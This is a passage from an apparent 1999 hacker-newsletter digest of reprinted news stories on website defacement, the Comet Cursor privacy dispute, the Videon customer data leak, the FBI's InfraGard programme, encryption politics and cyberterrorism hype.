much as 10 years in prison if damage is caused recklessly as a result of the
breach.
''Obviously e-commerce is a very important part of our business and very
important to the company,'' said Lapierre.
Staples's goal is to have 1 million on-line customers and $1 billion in Internet
sales by 2003, Lapierre said.
Staples, which did $7 billion in sales last year and which operates more than
1,000 office superstores, launched its Web site a year ago.
While monitoring the site Oct. 9, officials noticed that products advertised
throughout the Web site had been deleted and replaced with products bearing
the Office Depot logo.
The suit said that the Office Depot advertisements contained links to the
Florida company's Web site, meaning that Staples's shoppers who clicked on
the illegally advertised products were redirected to the competitor's Web site.
Shoppers were diverted from Staples to Office Depot for about an hour
before the problem was corrected, Lapierre said.
In addition to lost business, Staples alleges that it cost the company time and
money to repair its Web site and to determine the extent of the security
breach.
Calls to Office Depot, the world's largest seller of office products, were
referred to the company's vice president of public relations, who couldn't be
reached for comment late yesterday.
Lapierre said the problems created by the hacker had never happened to
Staples before. ''It's an interesting time we live in,'' she said.
Staples's stock rose yesterday to close at 23-13/16 in trading on the Nasdaq
market. Office Depot closed at 11 1/2, down , on the New York Stock
Exchange.
This story ran on page D01 of the Boston Globe on 11/30/99.
© Copyright 1999 Globe Newspaper Company.
Associated Press;
Story Filed: Tuesday, November 30, 1999 12:50 PM EDT
BOSTON (AP) -- Office supply store Staples has filed suit against an
unnamed hacker who broke into its Internet site and posted
advertisements that led Web browsers to the home page of one of its
chief competitors.
In the suit filed Monday in U.S. District Court in Boston,
Framingham-based Staples charged that the hacker, referred to as
``John Doe,'' illegally entered the site and damaged Staples by
stealing e-commerce business.
The suit claims that ``John Doe'' lives in or near Massachusetts, and
that the company expects to identify him shortly.
The hacker broke into the Staples Internet site on Oct. 9 and posted
advertisements for Office Depot. Shoppers who clicked on the Office
Depot products were linked to the Office Depot home page. The problem
was corrected after about an hour.
In the suit, Staples alleges that, aside from a loss of money, it cost
time and money to find and fix the security breach.
Staples officials speculated that changes to the Web page were a prank,
and discounted the possibility that its competitors were behind it.
Gary Schweikhart, an Office Depot spokesman, said Tuesday the company
was outraged by the computer hack and said Office Depot had no part in
it.
``We're not that dumb and at the same time we would not condone any
activity that is illegal and unethical,'' he said.
Federal law calls for a maximum of 10 years in prison if damage is
caused as a result of unauthorized access to a computer.
Staples, which did $7 billion in sales last year, launched its Web site
a year ago. The company hopes to have 1 million Internet customers and
$1 billion in Internet sales by 2003, Lapierre said.
Copyright © 1999 Associated Press Information Services, all rights reserved.
@HWA
06.0 Comet bows to consumer pressure
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by Ted
Yesterday Comet Systems Inc. was accused of
collecting data on consumers web surfing practices with
their free cursor changing software. The software
Comet Cursor, is installed on over 16 million systems and
tracks web usage of over 60,000 web sites. Following
rampant consumer outcry over the practice Comet
Systems has agreed to allow consumers to delete the
serial number used to track individual web surfing habits
and will also seek certification from Truste, the industry
privacy watchdog group. Truste's certification of Comet
Systems could take 45 to 60 days.
Associated Press - via San Jose Mecury News
http://www.sjmercury.com/svtech/news/breaking/ap/docs/1137191l.htm
Software firm in privacy flap
BY TED BRIDIS
Associated Press Writer
WASHINGTON (AP) -- A company that offers free software to change an
Internet browser's computer cursor into cartoon characters promised
Tuesday to let people delete a serial number the company was using to
track customers across the Internet.
Responding to an outcry over the privacy implications of its software,
Comet Systems Inc. also said it will seek certification from Truste, an
organization that monitors whether Web sites are following the privacy
promises they make to consumers.
Truste said Comet Systems had ``significantly damaged the trust of their
customers.''
New York-based Comet Systems acknowledged Monday that its cursor software
-- used by more than 16 million people -- reports back to its own
computers with each customer's unique serial number each time that person
visits any of 60,000 Web sites that support its technology.
Those sites include dozens aimed at young children, such as those for the
Dilbert and Peanuts characters of United Feature Syndicate Inc. and the Ty
Inc. site for Beanie Babies.
Comet said it never violated customers' privacy because it does not
attempt to match its serial numbers against anyone's real-world identity.
But it said Tuesday it will allow customers to delete those numbers,
anyway, although the numbers helped Comet keep an accurate census of its
customers for marketing and billing purposes. Some Web sites pay Comet
based on the number of visitors using the cursor-changing technology.
Customers will be able to download a program starting Wednesday from
Comet's Web site, at www.cometsystems.com, to replace their serial number
with a meaningless number that isn't unique.
``If that's what we need to do to appease users, we'll do that,''
spokesman Ben Austin said.
Comet's certification to Truste could take 45 to 60 days. But that
organization only monitors data collected at a company's Web site, not by
its stand-alone software programs.
``We don't cover software privacy practices,'' Truste spokesman David
Steer acknowledged Tuesday. ``Comet Systems has realized they have
significantly damaged the trust of their customers, and they're looking at
ways to rebuild that trust.''
Critics said earlier that the company should have more openly disclosed
the behind-the-scenes transmissions, which are made without warning. They
also said it would not be difficult given today's technology to begin
correlating the Comet serial number with a consumer's identity if the
company suddenly decided to or if Comet -- with its extensive tracking
database -- were purchased by new owners willing to do that.
``The typical guy who goes to Best Buy and buys a computer and installs
this software, he'll never know about this stuff,'' said programmer Dave
Gale of Tampa, Fla. ``It's like a toy, but you wouldn't expect a toy to
follow you around on the Internet.''
Steer, the spokesman for Truste, said other companies also undoubtedly are
clandestinely monitoring the online behavior of their customers.
``I believe there are a lot of other software companies that are
collecting personal information and not disclosing it,'' he said. ``That
is just no longer acceptable.''
Internet discussion groups were filled Tuesday with messages from angry
people who believed the cursor software did or could violate their
privacy.
In a statement published on the company's Web site, Comet President Jamie
Rosen said the company was ``quite surprised'' at the privacy questions
because the software doesn't ask for a customer's name, e-mail address or
other personal information.
``We deeply regret that this has caused concern among our users and we
pledge to be a leader in the area of online privacy in the future,'' he
said.
@HWA
07.0 Personal Info of Canadian ISP Users Leaked
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Astroboyz and dj.tazz
The personal information on almost 2,700 Internet users
in Manitoba Canada was stolen and spread across the
Internet. Users of the Videon Wave's Internet cable
services had thier account numbers, along with
customer names, addresses, phone numbers, user
names and passwords stolen. The intrusion into Videon
systems took place almost two weeks ago however the
company never notified any of the effected customers.
The incident has not been reported to the local Police or
the RCMP.
Winnipeg Free Press
Does anyone have a better link? This one is about to
expire.
http://205.200.191.20/cgi-bin/LiveIQue.acgi$rec=3673?search
Hackers tear cover off Videon security
Tue, Nov 30, 1999
By Doug Nairne
Legislature Reporter
PERSONAL INFORMATION on almost 2,700 Videon cable modem customers has been
obtained by Internet hackers in what is being called one of the most
damaging computer attacks ever against a Manitoba company.
The information has become a hot property as it is passed around the
city's computer underground, while irate customers are demanding to know
why Videon didn't notify them that their names, phone numbers and
passwords had been taken.
The list includes 2,688 Videon account numbers, along with customer names,
addresses, phone numbers, user names and passwords.
Reid Eby, an Internet security consultant and president of Interlink
Online Services, said hackers could use the information to access people's
Internet accounts and send and receive e-mail as if they were the owner.
E-mail that has already been downloaded to a computer is safe, but
all incoming messages can be intercepted. There is no impact on Videon
cable TV subscribers, only cable modem users.
"If they got the user names and passwords, this is the worst incident I've
ever heard about locally," Eby said. "Given what is going on with hacking,
placing any client information on-line in this day and age is silly."
Eby said the Videon information would also be valuable for sale to direct
marketers and junk mailers, who would covet the contact data for high-end
computer users.
Anyone who does any business transactions on-line may also be in danger,
especially if their credit card numbers are transmitted back to them in a
receipt. Hackers could also use the information to "socially engineer" a
target, tricking people into revealing more information about
themselves or making their computers vulnerable to intrusion.
Videon spokeswoman Nadine Delisle said that a routine security sweep last
week showed that customer information had been pilfered. She claimed that
no passwords were obtained, although lists being circulated clearly
include passwords, user names and other information.
Despite the criminal nature of the intrusion, city police and RCMP said
the incident has not been reported to their investigators.
Sources say the hack took place during the second week of November, but
none of the Videon customers contacted by the Free Press yesterday knew
that anything had happened.
"I'm a little surprised that we were never notified about this," said
businessman Sam Katz, whose wife's personal cellular phone number is on
the list, along with his other information. "I'd like to think these
things are a little bit better secured."
Delisle said Videon decided the information wasn't sensitive, so customers
were not informed about the security breach.
"The risk seemed to be very minimal," she said. "It was not assessed to be
important."
Katz disagreed, saying he plans to find out why he wasn't notified.
Winnipeg police Const. Bob Johnson said companies often don't report
hacking because they are concerned about bad publicity.
Delisle said the incident was not "serious enough" to report to police.
"We closed the security hole so that this will not happen again, that was
the priority," she said.
But a spokeswoman with the Canadian Radio-television and
Telecommunications Commission said Videon customers can file a complaint
against Videon and demand an explanation.
"People should be able to get the reasons why their private information
was leaked out," she said.
The customer list contains a wide cross-section of Winnipeggers, including
doctors, business people, university professors, journalists and even
computer security experts. The hackers say they could pose as any one of
the people on the list, although there is no evidence that anyone
has done so yet.
Hackers contacted said they were particularly pleased to get the personal
information of one Videon customer -- a computer security expert who has
written articles on the psychology of hackers, describing them as geeks
and loners.
Meanwhile, Ron Campbell, another cable modem customer whose details have
been disclosed, said he is upset about the incident but that he doesn't
blame Videon for the security breach.
"I don't particularly think Videon could have stopped this from
happening," he said. "I assume they had some security in place."
PHOTO ILLUSTRATION BY JOE BRYKSA/WINNIPEG FREE PRESS
Hackers managed to breach Videon's security and gain access to customers'
personal files.
@HWA
08.0 First Internet Piracy Case in Japan
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Galleon
A 21-year-old student has been accused of illegally
distributing over 170 titles of game software for
different Nintendo machines. This is the first case of an
unauthorized delivery of game software via the Internet
in Japan.
Asia Biz Tech
http://www.nikkeibp.asiabiztech.com/wcs/frm/leaf?CID=onair/asabt/news/85776
Hokkaido
Police Pursue Unauthorized Net Delivery of Game Software
December 1,
1999 (TOKYO) -- The Hokkaido Prefectural Police's Sapporo Kita Station
alleged that a college student delivered unauthorized game software
over the Internet.
It sent papers on Nov. 25, 1999 to the Sapporo District Prosecutor's
Office for prosecution.
The 21-year-old student, who has been accused of illegally distributing
about 180 titles of game software for Family Computer (Famicon) and
Game Boy game machines made by Nintendo Co., Ltd., is suspected of
infringing on rights under the Copyright Law.
The case is the first disclosure of an unauthorized delivery of game
software via the Internet in Japan.
The college student reportedly distributed the software on his own
Web page,labeled as "information exchange," to seem as if the
delivery did not constitute downloading of game software.
Game software for sale is usually recorded in read-only memory (ROM).
The student ran software which emulates a game machine on a personal
computer, and stored the game software recorded in these ROMs on
a hard disk drive on the PC and uploaded it onto a Web server.
According to Association for Copyright for Computer Software (ACCS),
which assisted the police in the disclosure of the case, there
seemed to be a lot of downloading from the suspect's Web site, but
it does not know how many downloads were actually made.
An ACCS spokesman said that software distribution without authorization
of an author itself is unlawful. In addition, the suspect knew
the case was illegal, intentionally concealed the illegal uploading
and downloading and distributed not just a few software programs over
the Internet, the spokesman said.
ACCS assumes there must be many other cases of illegal uploading and
downloading of game software via the Internet. The association
therefore hopes that the disclosure of the case will serve as a warning
to the public.
[Comment by BizTech]
The disclosure of the illegal uploading and downloading of game software
was based on a "breach of the Copyright Law." However, there are various
applications of the Copyright Law depending on the case. In this case, the
college student was suspected of "infringing on the right of public
transmission under the Copyright Law."
"The right of public transmission (Article 23 of the Copyright Law) is an
author's proprietary right to transmit his or her work to the general public
via broadcasting and/or communications. For example, an author's authorization
will be needed for any broadcasting of a work in a television or radio program.
(Note. In Japan, granting of copyrights and collection of license fees for
the majority of musical works are performed by the Japanese Society for
Rights of Authors, Composers and Publishers (JASRAC).) Distribution of
works over the Internet is included in the public transmission right.
Distribution of any software and musical data over the Internet shall constitute
infringement on the public transmission right and thus breaches the Copyright Law.
(Note. Any case which constitutes "reference" under the Copyright Law
shall be excluded from this case.)
For example, if someone transforms Celine Dion's hit number, "My heart will go
on," into MIDI data without obtaining Dion's permission and plays the song
on his or her own Web site as background music, strictly speaking such
an act would constitute infringement or the public transmission right.
(Note: Any works whose copyright is obviously expired shall be excluded from
this case. For example, any distribution of MIDI data of well-known works
such as a composition made by Mozart, Beethoven or Chopin, is generally
legal.)
In this case, the college student uploaded game software on a Web server
without obtaining authorization of the authors of the game software, and
enabled anybody who can access the Web site to download the software
programs. This is called "enabling of public transmission." The case infringes
on the public transmission right.
In addition to infringing on the public transmission right, the suspected
student also breached the Copyright Law for uploading of the game software on
the Web server because the student made unauthorized copies of software
(Infringement on the reproduction right, Article 21 of the Copyright Law).
In the case, the suspect made unauthorized copies when copying the game software
from ROMs to the hard disk drive of his or her PC and when copying it from
the hard disk drive to a hard drive on the Web server. Because of the suspect's
ultimate objective was to distribute of software over the Internet, the
case does not constitute a "reproduction for private use" under Article 30
of the Copyright Law, and thus breaches the Copyright Law. The suspect repeatedly
breached more than one provision of the Copyright Law, even though the other
breaches were not disclosed.
(Kazumi Tanaka, Deputy Editor, BizTech News Dept.)
@HWA
09.0 FBI Launches InfraGuard in Ohio
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Weld Pond
A national program known as InfraGuard, developed by
the FBI to promote information sharing among law
enforcement, industry, the academic community and the
public about computer network intrusions and computer
system vulnerabilities, was officially launched in Ohio
yesterday. Over 200 people where expected at the
kickoff meeting. (Watch for an exclusive insiders report
on InfraGuard coming soon to HNN.)
The Cincinnati Post
http://www.cincypost.com/news/hacker112999.html
C I N C I N N A T I P O S T
FBI leads new effort to help
thwart hackers
Post staff report
Nearly 200 people were expected at today's kickoff
meeting of a group organized by the FBI to thwart
hackers from breaking into government, industry and
academic computer systems in Cincinnati and southern
Ohio.
Speakers included Cincinnati FBI agent in charge
Sheri Farrar, Southern Ohio U.S. Attorney Sharon
Zealey, Ohio Bureau of Criminal Identification and
Investigation Superintendent Ted Almay and
representatives from the FBI's National Infrastructure
Protection Center.
The regional meeting, held at Deer Creek State Park
in Pickaway County, is part of a national program
developed by the FBI and industry to promote
information sharing among law enforcement, industry,
the academic community and the public about
computer network hacking and computer system
vulnerabilities.
So-called ''InfraGard'' chapters are designed to help
protect the nation's information systems from cyber
and physical threats. The Cincinnati FBI's chapter
includes the 48 southern-most Ohio counties, including
Cincinnati, Dayton and Columbus.
A national InfraGard program was developed after
President Clinton directed the FBI to identify and
coordinate computer infrastructure protection experts
inside and outside the federal government.
Members of the Cincinnati chapter include the Ohio
Supercomputer Center, American Electric Power,
Ohio State University and Bank One.
Members eventually will have access to an Alert
Network that will allow them to use encryption
technology to report attacks on their computer
systems to the FBI. The FBI will provide what it calls
a ''sanitized'' description of the incident, without
identifying the source of the report, to other chapter
members so they can take actions to protect their own
systems.
Members also will have access to an InfraGard Web
site being created by the FBI that will provide timely
information about computer protection issues.
Target: Hackers
InfraGard is seeking more regional chapter members
from telecommunications, banking, energy and
transportation industries, as well as from academic
institutions, hospitals and government agencies.
For more information, call Cincinnati FBI agent
Roger Wilson at (513) 421-4310.
Publication date: 11-29-99
@HWA
10.0 National Gun Database Goes Online
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Weld Pond
A national gun database, Online Lead, was activated
Tuesday at all 331 branches of the Treasury
Department's Bureau of Alcohol, Tobacco and Firearms.
The system is available to police and other local law
enforcement officials through ATF offices. The database
included the gun's make and serial number, and the
complete chain of sale from manufacturer to wholesaler
or distributor to the first retail sale by a federally
licensed gun dealer. Officials have said that security
measures to protect the database from malicious
intruders has been taken but did not elaborate.
Associated Press
http://library.northernlight.com/EB19991130720000025.html?cb=0&dx=1006&sc=0#doc
Story Filed: Tuesday, November 30, 1999 11:44 AM EDT
WASHINGTON (AP) -- Federal and local law enforcement officials are getting
a new high-tech tool to fight crime: a nationwide computer system that
aims to trace guns used during crimes.
The system, called Online Lead, is administered by the Treasury
Department's Bureau of Alcohol, Tobacco and Firearms and has been
operating on a limited trial basis since February.
``Online Lead takes our fight against gun traffickers into cyberspace,''
said Treasury Secretary Lawrence Summers, who made the announcement today.
``It gives federal, state and local law enforcement officials throughout
the country a new tool to help identify and arrest gun
traffickers.''
Starting today the computer system is operating full time and is widely
available. Specifically, the system is in use at all 331 ATF field
offices. Although police and other local law enforcement officials can't
tap directly into the system on their own, they can access the
system through ATF.
Local law enforcement officials are encouraged but not required to ask ATF
to trace guns used during crimes. The results of those traces are entered
into a growing national database, which now has information on more than 1
million traced firearms.
ATF has been tracing guns used in crimes for years, but the sophisticated
software used in the new online system should make it much easier for
investigators to analyze trends and patterns in illegal firearms
trafficking, law enforcement officials said. For police and other
local law enforcers, the system may provide new leads and additional
information about crimes, they said.
Online Lead is updated frequently and provides information on a traced gun
one day after it is completed.
The new system evolved from earlier projects that aim to provide
investigators access to data on guns used in crimes. Those systems stored
information on traced guns on computer discs that had to be shipped to ATF
field offices, a slow process. The new online system gives law
enforcers fast access to such information.
Information about all firearms traced by the ATF goes into the national
database and is available on the new online system. What agents can trace
is limited. They start with a gun's make and serial number, moving forward
from the manufacturer to a wholesaler and distributor to the first
retail sale by a federally licensed gun dealer.
All sales by licensed dealers must be recorded, and those records must be
made available to ATF. But any sales by individuals or by collectors at
gun shows, for example, are considered private and exempt from such
record-keeping requirements.
Copyright © 1999 Associated Press Information Services, all rights reserved.
@HWA
11.0 Zero Knowledge Ships Freedom, Finally
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Jordan
After what seemed like an agonizingly long beta period
Zero Knowledge Systems has finally shipped Freedom
1.0. Freedom works seamlessly alongside your favorite
browser and other Internet applications. You can surf
the web, send email, chat, telnet, and participate in
newsgroups as you normally would, only now with
complete confidence that your personal information is
not being collected without your consent. Freedom
identifies you on the net with a 'nym' that you choose.
There can be only one 'nym' so unless you want
something like 'Tom4538720' you should reserve yours
today.
Freedom 1.0
http://www.zks.net/clickthrough/click.asp?partner_id=542
@HWA
12.0 OpenBSD 2.6 Ships
~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Theo
What is probably t
he most secure operating system
available has shipped its new version. OpenBSD 2.6 is a
FREE, multi-platform 4.4BSD-based UNIX-like operating
system. It emphasizes portability, standardization,
correctness, proactive security and integrated
cryptography. Some of the new features include the
addition of ssh (OpenSSH) and Perl 5.005_03 to the
base system, reliability patches for the PowerPC port,
improved support for ext2fs, USB support, a faster
install process and a lot more.
OpenBSD
http://www.openbsd.org/
@HWA
13.0 Videon Was Warned of Data Loss
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by dj.tazz and P_Simm
The Canadian ISP, Videon, was warned that it had left
its customer database available on the web for all to
see. Days later, after the database had made the
rounds on the net the security issue was resolved.
Customers however where never notified by the
company. They did not find out about the problem until
weeks later when it appeared in the local newspaper.
Videon has confirmed that they received the emailed
warning and failed to act in a timely manner to prevent
the loss of customer account numbers, names,
addresses, phone numbers, user names and passwords.
Winnipeg Free Press
http://205.200.191.20/cgi-bin/LiveIQue.acgi$rec=3772?search
Videon ignored Web security breach
E-mail warning of leak never received reply
Wed, Dec 1, 1999
By Doug Nairne
Legislature Reporter
VIDEON WAS warned that its cable modem customer list was left unprotected
on the Internet but failed to act for at least a day, allowing hackers a
chance to pilfer the sensitive information, the Free Press has learned.
An e-mail message identifying the security leak was sent to Videon
security staff on Nov. 10, which is thought to be the day prior to when
personal details on about 2,700 people were downloaded.
A man who asked to be identified only by his computer user name, "Grub,"
said he sent the warning after stumbling on the customer data base while
surfing the Videon Web site.
Despite Videon's insistence that the information was taken after a
"deliberate attack," Grub said he found it sitting out in the open where
anyone could have seen it.
"When I found this I thought, 'Holy smokes, I can't believe this is up
there,' " he said. "They might as well have written out the list and taped
it to the front door."
Grub said he e-mailed Videon warning them of the problem but never
received a reply.
"They make it sound like a big computer attack, but it was probably just
their own stupidity," he said.
Sometime later, the list was discovered by someone else and copies began
to be made. According to Videon, customer names, addresses and phone
numbers have been posted to an Internet chat group, where it would be
widely accessible.
Videon spokeswoman Nadine Delisle confirmed that Videon received the
warning e-mail. She said that a combination of bad judgment by staff and
the Remembrance Day holiday resulted in the message initially being
ignored.
"At the time it was not perceived to be a big risk," she said. "In
retrospect, that may have been an error in judgment."
Hackers ended up getting what they describe as a gold-mine of information,
including account numbers, names, addresses, phone numbers, user names and
passwords. They say the information can be used to intercept people's
e-mail or to assume someone else's identity on the Internet.
After playing down the security leak Monday, Videon was scrambling to deal
with the crisis yesterday. Senior executives and communications staff were
in emergency meetings most of the day.
Delisle said Videon was planning a massive e-mail broadcast to all its
cable modem customers to inform them of the incident, and will provide
instructions on how to take precautions like changing passwords.
She said Videon also wants to reassure people that their billing
information and credit card numbers were not revealed.
An internal investigation is being carried out, and an outside firm will
be brought in to do a full security audit, Delisle said.
About a dozen angry customers called the Free Press yesterday, most
wanting to know why Videon didn't tell anyone what had happened --
including the police -- until yesterday, more than two weeks after they
found out the information was taken.
While passwords can be quickly changed, other information like addresses
and phone numbers are also being passed around, leaving people vulnerable.
One woman, who asked not to be identified, said she is outraged that she
was not told her information had been downloaded.
"Anyone with a computer may be able to get my name and phone number, and
address," she said. "My daughter won't be playing outside alone anytime
soon, because now I won't know if some pervert has gotten my address and
is lurking around my house."
The woman said she is considering cancelling her account.
Delisle said that in retrospect the decision to keep the incident quiet
may not have been the right one.
"We're still piecing together all the details of what happened," she said.
"The important thing is that this does not happen again."
Videon will set up a Web site to help customers at www.videon.ca/secure
and also plans to take out ads in Winnipeg newspapers to explain what
happened.
Videon customers have set up at least one other site with instructions on
changing passwords. After being on-line for only 90 minutes, the site had
29 hits.
@HWA
14.0 German Digital Signature Chip Broke
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by cripto
After months of intense lobbying for a secure system
and only days after being ratified by the European Union
the German Digital Signature has been broken. The
digital signature card, developed by Siemens, is to be
used in cashless payment systems and access control
systems. With data dumps of the SLC44/66 chip and
information explaining its design floating around the
Internet anyone using the so-called Geldkarte system
stands the risk of having money transferred without
their knowing it.
The UK Register
http://www.theregister.co.uk/991201-000021.html
Posted 01/12/99 4:19pm by Mike Magee
Siemens German digital signature chip hacked
Hackers have succeeded in cracking the Siemens digital signature card used in
cashless payment systems and access control systems across the country.
The German Digital Signature was ratified by the European Union only a few days
ago, after intense lobbying for a secure system for transactions.
The serious breach of security means that anyone using the so-called Geldkarte
system stands the risk of having money transferred without their knowing it.
A dissasembled dump of the SLC44/66 chipcard CPU in TeX, along with two pages
of German text explaining the design has been available on bulletin boards for some
time, according to the source.
The dump is currently being re-engineered and commented, according to a source,
and the knowledge gained has already been used to get hold of Telesec private keys.
®
@HWA
15.0 IETF Members Under Investigation For Treason
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Weld Pond
Some members of the Internet Engineering Task Force
seem to be under investigation by the DOJ and FBI. The
reason for the investigations seems to be the desire to
include encryption and exclude back door capabilities in
new protocols proposed by the IETF. The investigations
are centered around treason charges.
NT Security
http://www.ntsecurity.net/go/2c.asp?f=/news.asp?IDF=186&TB=news
ZD Net
http://www.zdnet.com/zdtv/cybercrime/chaostheory/story/0,3700,2398590,00.html
Crypto Advocate Under FBI Investigation
Tuesday, November 30, 1999 - We recently published a story
regarding cryptography and IPv6, where somseone at the
Department of Justice accused Scott Bradner, Internet Engineering
Task Force (IETF) area coordinator, of an anti-social act by trying to
get encryption inserted into the new protocol. Later, at an IETF
meeting where votes were taken for IPv6 encryption inclusion, Fore
System's Brian Rosen brazenly claimed that regardless of any
encryption inclusion, Fore systems would proceed by including back
doors into any included encryption technology. But the harrassment
of the IETF doesn't stop there.
Just how far will our federal government go towards controlling
strong encryption? Apparently, very far. And this isn't a new effort
by any means. We learned that William Allen Simpson, a
Detroit-based computer consultant who was on the IETF staff, has
been investigated by the federal government for treason charges.
Simpson was the person that argued loudly for encryption to be
included in the PPP protocol when it was still in design phases. That
push landed Simpson in hot whatever with federal officials. Simpson
learned through friends that he was under investigation for treason
-- the FBI had been interviewing his friends and associates.
Simpson obtained 54 pages of documents from the government under
the Freedom of Information act, however the documents were
heavily censored, including the bureau's basis for the investigation.
According to a ZDTV report, Simpson did learn that the FBI had
accused him of "challenging authority and laws that may impinge
upon his activities."
Wait a second! Isn't that part of what the Constitution is all
about--the means to peacefully object to the laws of the land? I
think so. And if that's true, then that certainly positions the FBI in a
bad light since it would appear their actions are counter to the
Consitutional rights. It not against the law to develop strong
cryptography, but it is against the law to export that technology
outside of proper governmental controls. The PPP protocol did not
have encryption at the time--it was only a suggested inclusion--so
why investigate a person for doing something completely legal?
The IETF is an open public standards body that conducts its business
in clear public view. They help stear standards that better ensure
compatibility and interoperability. So why would the FBI investigate
an IETF member just because that person suggested in a public
meeting that strong encryption be included in a standard
wide-spread protocol such as PPP?
ZDnet;
The New Crypto-Commies
Could arguing for strong encryption be
the next 'un-American activity' that
justifies blacklists and secret FBI
investigations?
By Kevin Poulsen November 24, 1999
Newly released documents show that the
FBI closely monitored a key member of the
standard-setting Internet Engineering
Task Force (IETF) in 1992 and 1993, as
he waged a doomed battle to inject
crypto support into an emerging critical
Internet standard.
William Allen Simpson, a Detroit-based
computer consultant, was on the IETF.
The team was developing the "Point to Point
Protocol" (PPP), designed to
facilitate Internet access over dial-up
modems. Simpson was making waves in
the PPP Working Group by loudly arguing
for inclusion of crypto support in the
protocol, which today is used by the vast
majority of home Internet users to go
online.
In 1993, Simpson learned from a family
member and colleagues that his efforts
had drawn the FBI's interest. As he recalls
it, the bureau was accusing him of a
capital offense.
"Two guys came up to me at a meeting,"
Simpson recalls. "They said, 'Bill, I was
interviewed for a treason investigation by
the FBI'."
"Bill was advocating encryption for
authentication and for privacy in
standardized Internet protocols," recalls
Electronic Frontier Foundation cofounder
John Gilmore, who heard of the
investigation and suggested that Simpson
request his FBI file under the Freedom of
Information Act.
"He's kind of an iconoclast," Gilmore told
me. "He follows his own way and
sometimes it pisses people off, but it can
be an advantage when you're faced with
a Kafkaesque investigation by the
government. He has the tenacity to stick
with it until he finds the truth."
After six years of wrangling, Simpson
finally pried 54 pages from the grasping
hands of the domestic spies last
Wednesday, only to find that the
documents were heavily censored.
@HWA
16.0 Jane's Releases Cyberterrorism Report
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by turtlex
Jane's Information Group has released its much
anticipated report on cyberterrorism. While the actual
information in the article seems rudimentary and crude
its conclusions about the possibility of a full out terrorist
attack over the internet being extremely remote seem
dead on. (Warning this is an extremely long and dry
article that presents litte new information.)
Jane's Defense Weekly
http://jir.janes.com/sample/jir0525.html
Cyberterrorism hype
With the 1990s propensity to dot.com everything that moves, 'hacking' and
'cyberterrorism' have become subjects of intense media coverage. Almost daily,
hitherto unknown security specialists warn of potential catastrophes: news that
gets picked up by the media and crosses the globe with impunity. Johan J
Ingles-le Nobel discussed the subject with programmers at Slashdot to profile
so-called cyberterrorists and examine the viability of cyberwarfare.
Cyberterrorism is a buzzword of 1999. Indeed, with the
remarkable growth of the Internet, hacking horror stories
have reached new heights of publicity, leading to a veritable
media frenzy. Yet careful examination of the issue reveals
much of the threat to be unsubstantiated rumour and media
exaggeration. The exaggeration is understandable, however
- these technologies underpin our entire society, and what paper can resist
printing a scoop revealing that banks are being blackmailed with threats of
attacks on their computers, or that a military satellite has been hijacked by
hackers? The idea that an anonymous teenager working alone from his bedroom
can wreak electronic havoc on the far side of the world makes for good press.
What is a hacker?
Nothing gets a hacker's back up quicker than someone confusing a hacker with
cracker. The term 'hacker' refers to an individual who programmes
enthusiastically (even obsessively), enjoys programming or is especially good at
programming; a 'cracker' is somebody who breaks into another's computer
systems or digs into their code (to make a copy-protected programme run). Yet
the boundaries have become somewhat blurred and the popular understanding of
these terms is is quite wrong: ever since Hollywood produced 'Wargames', based
on Kevin Mitnic's cracking activities (known as 'exploits'), the term 'hacking' has
become synonymous with unauthorised access into restricted systems - which
is 'cracking'. In today's world, such activity also includes the deliberate
defacement of websites. Hackers are quick to point out that there is a code of
hacker ethics that precludes any profit from the activity - the only motive is the
activity itself - but they are not naïve: realising the potential for misuse, they
divide themselves into 'white-hat' hackers (ethical hackers) and 'black-hat'
hackers (crackers).
According to hackers, 99% of cracking incidents can be blamed on so-called
'script-kiddies'. These are usually young people who manage to acquire some
'cracking tools' somewhere on the Internet and are keen try them. They choose a
'cool' target (such as NASA, the Pentagon or the White House) and launch the
tools. Older, more established
hackers see them as upstarts. Think of a kid walking down a corridor
testing doorknobs; whilst they are more than capable of defacing
websites such as that of the Central Intelligence Agency (CIA), their
actions are seen as the equivalent of putting down a whoopie cushion
on the chair of the UN Secretary General - juvenile, noisy and
somewhat embarrassing, but ultimately without real effect. Says Mick
Morgan, webmaster to the UK's Queen Elizabeth: "I have nightmares about
waking up to find graffiti (which is all it is) on one of my customer's sites."
However, even minor exploits illustrate one of the many paradoxes facing
computer security. Specific websites, intended for the computer systems
administrators and webmaster audiences, monitor the security vulnerabilities
(bugs) in software that allow exploits to take place. The purpose of these
websites is to distribute the corrective programming 'patches' that rectify the
bugs. However, such sites are open to the public and are therefore the ideal
place for crackers to discover new cracks. The result of this is that the vast
majority of methods used by crackers to break into sites are known and there
are patches available. This means that many believe the responsibility for
security breaches lies not with the software supplier but with the company that
owns and operates the system. Thus, if a company suffers a security breach,
that highlights its own negligence or incompetence, which, along with the bad
publicity associated with intrusions, makes it unsurprising that many companies
are reluctant to publicise security breaches of their systems. This is especially
true of the financial sector: there have been rumours for several years that banks
have been blackmailed by hackers; confirmation has never been forthcoming.
Cracker profile
Global estimates vary, but a JIR extrapolation based on mid-1990 estimates by
Bruce Sterling, author of The Hacker Crackdown: Law and Disorder on the
Electronic Frontier, puts the total number of hackers at about 100,000, of which
10,000 are dedicated and obsessed computer enthusiasts. A group of 2501,000
are in the so-called hacker 'élite', skilled enough to penetrate corporate systems
and to unnerve corporate security. Given the huge number of people working as
programmers for the online economy (the technical side of which requires much
the same skills as those required by a hacker), the totals are sure to rise.
According to the Center for Research on Electronic Commerce at the University
of Texas, in 1998 the Internet economy was worth US$301.4 billion, providing 1.2
million jobs in the USA alone.
